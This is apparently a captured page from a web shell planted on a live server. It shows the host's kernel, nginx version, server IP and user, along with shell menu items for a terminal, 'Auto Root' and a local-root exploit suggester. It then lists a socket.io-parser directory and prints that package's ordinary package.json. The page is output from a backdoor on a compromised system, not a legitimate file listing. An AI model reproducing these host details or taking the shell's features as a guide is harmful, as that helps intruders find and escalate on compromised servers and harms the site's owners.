Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.133.83.94
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
socket.io-parser /
Delete
Unzip
Name
Size
Permission
Date
Action
dist
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
CHANGELOG.md
3.31
KB
-rw-rw-r--
2022-08-30 11:49
LICENSE
1.08
KB
-rw-rw-r--
2022-08-30 11:49
Readme.md
2.33
KB
-rw-rw-r--
2022-08-30 11:49
package.json
1.4
KB
-rw-rw-r--
2022-08-30 11:49
Save
Rename
{ "name": "socket.io-parser", "version": "4.0.4", "description": "socket.io protocol parser", "repository": { "type": "git", "url": "https://github.com/socketio/socket.io-parser.git" }, "files": [ "dist/" ], "main": "./dist/index.js", "types": "./dist/index.d.ts", "dependencies": { "@types/component-emitter": "^1.2.10", "component-emitter": "~1.3.0", "debug": "~4.3.1" }, "devDependencies": { "@babel/core": "~7.9.6", "@babel/preset-env": "~7.9.6", "@types/debug": "^4.1.5", "@types/node": "^14.11.1", "babelify": "~10.0.0", "benchmark": "2.1.2", "expect.js": "0.3.1", "mocha": "3.2.0", "prettier": "^2.1.2", "rimraf": "^3.0.2", "socket.io-browsers": "^1.0.0", "typescript": "^4.0.3", "zuul": "3.11.1", "zuul-ngrok": "4.0.0" }, "scripts": { "compile": "rimraf ./dist && tsc", "test": "npm run format:check && npm run compile && if test \"$BROWSERS\" = \"1\" ; then npm run test:browser; else npm run test:node; fi", "test:node": "mocha --reporter dot --bail test/index.js", "test:browser": "zuul test/index.js --no-coverage", "format:fix": "prettier --write --parser typescript 'lib/**/*.ts' 'test/**/*.js'", "format:check": "prettier --check --parser typescript 'lib/**/*.ts' 'test/**/*.js'", "prepack": "npm run compile" }, "license": "MIT", "engines": { "node": ">=10.0.0" } }